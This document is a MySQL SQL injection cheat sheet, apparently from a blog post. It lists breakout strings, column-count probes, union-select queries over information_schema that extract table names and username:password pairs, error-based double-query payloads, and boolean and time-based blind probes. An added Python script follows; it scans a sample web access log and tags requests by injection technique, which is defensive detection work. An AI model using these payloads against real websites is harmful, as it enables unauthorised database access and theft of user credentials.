Common injection statements

# Basic injection
' --+
' --%20
' #
' %23
' and 1=1 --+
' and 1=2 --+
' and 1=2 union select * from admin --+
' and 1=2 union select * from user --+
' and 1=2 union select * from users --+
# Find the number of columns
' order by 1 --+
' order by 2 --+
' order by 3 --+
' order by 4 --+
' order by 5 --+
' order by 6 --+
' order by 7 --+
' order by 8 --+
' order by 9 --+
' order by 10 --+
# Dump database information (only works when the column count is 1)
' and 1=2 union all select version() --+
' and 1=2 union all select user() --+
' and 1=2 union all select database() --+
# Determine the operating system
' and 1=2 union all select @@global.version_compile_os from mysql.user --+
# Database privilege check: a normal response means the user is root (first character of user() is 'r', ASCII 114)
' and ord(mid(user(),1,1))=114 --+
# Dump data
' and 1=2 union select user(),version(),database(),@@datadir,SCHEMA_NAME,current_user(),7,8,9,10 from information_schema.SCHEMATA limit 0,1 --+
' and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1--+
' and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+
' and 1=2 union select 1,2,3,group_concat(COLUMN_NAME),5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=table_name limit 0,1--+
' and 1=2 union select 1,2,3,group_concat(username),5,6,7,8,9,10 from table_name --+
' and 1=2 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from table_name --+

# Without comment characters
' and '1
' union select 1 and '1
' union select 1,2 and '1
' and 1=2 union select 1,version(),3 and '1
' or '1

# Single quote inside parentheses
') --+
') --%20
') #
') %23

# Double quote
" --+
" --%20
" #
" %23

# Double quote + parentheses
") --+
") --%20
") #
") %23

# Double-query (error-based) injection
# Count the records
select count(*) from table_name;
# Random number generation
select rand();
select rand()*4;
# Floating-point to integer (floor)
select floor(rand());
select floor(rand()*4);
# Alias
select floor(rand()*4) as query;
# Group by
select username,password from user group by username;
# Nested query
select(select database());
# String concatenation: concat(str1,str2)
select concat((select database()));
select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select concat(0x3a,0x3a,(select database()),0x3a,0x3a) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select user()),0x3a,floor(rand()*2)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query;

' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+
' and 1=2 union (select * from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+

# Blind injection
# Boolean-based blind
select database();
# Determine the length
select length(database());
# Substring: substr(str,num1,num2) num1: start position; num2: number of characters to take
select substr(database(),1,1);
# ASCII code
select ascii(substr(database(),1,1));

' and 1<2 --+
' and (ascii(substr((select database()),1,1)))=98--+

# Time-based blind
# Sleep
select sleep(1);
# Conditional test
select if((select database())="bloodzero",sleep(10),null);

' and sleep(10) --+
' and if((select database())="bloodzero",sleep(10),null)--+
Time: 2024-10-05 10:20:37
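Every family listed above (comment terminators, order-by column probing, union/information_schema reads, floor(rand()) double-query errors, boolean and time-based blind tests) leaves a recognisable trace in the web server's access log. The Python below is an added example, not code from the original post: it decodes request parameters from a constructed combined-format log and labels each one with the families it matches; the signature names and the sample log lines are this example's own.

```python
import re
from urllib.parse import parse_qsl

# One signature per injection family shown above; the names are this example's own labels.
SIGNATURES = {
    "quote_break":    re.compile(r"['\"]\)?\s*(and|or|union)\b", re.I),
    "comment_tail":   re.compile(r"(--|#)\s*$"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_read":    re.compile(r"\binformation_schema\.", re.I),
    "error_based":    re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "boolean_blind":  re.compile(r"\b(ascii|ord)\s*\(\s*(substr|mid)\s*\(", re.I),
    "time_blind":     re.compile(r"\bsleep\s*\(\s*\d+", re.I),
}

# Combined-format access log, constructed for this example. %27 is the quote,
# %20 and '+' are spaces, so the "--+" tail decodes to the "-- " comment used above.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2024:10:20:37 +0000] "GET /item.php?id=1%27%20order%20by%2010%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [05/Oct/2024:10:20:38 +0000] "GET /item.php?id=1%27%20and%201=2%20union%20select%201,2,3,TABLE_NAME,5%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=database()%20limit%200,1--+ HTTP/1.1" 500 203
10.0.0.5 - - [05/Oct/2024:10:20:39 +0000] "GET /item.php?id=1%27%20and%20(ascii(substr((select%20database()),1,1)))=98--+ HTTP/1.1" 200 512
10.0.0.5 - - [05/Oct/2024:10:20:41 +0000] "GET /item.php?id=1%27%20and%20if((select%20database())=%22bloodzero%22,sleep(10),null)--+ HTTP/1.1" 200 512
10.0.0.7 - - [05/Oct/2024:10:21:02 +0000] "GET /item.php?id=42 HTTP/1.1" 200 512
"""
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def classify(value):
    """Return the sorted list of injection families a decoded parameter value matches."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))

def scan_log(text):
    """Return one record per request parameter that matches at least one family."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        _, _, query = target.partition("?")
        # parse_qsl decodes %XX escapes and turns '+' into a space before we match
        for param, value in parse_qsl(query, keep_blank_values=True):
            families = classify(value)
            if families:
                hits.append({"ip": ip, "param": param, "techniques": families})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} param={hit['param']} -> {', '.join(hit['techniques'])}")
```

The clean request for id=42 produces no record; the four probes are each tagged with the families they combine, which is the signal to correlate by client address before the blind phase (many near-identical requests differing in one comparison value) starts.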
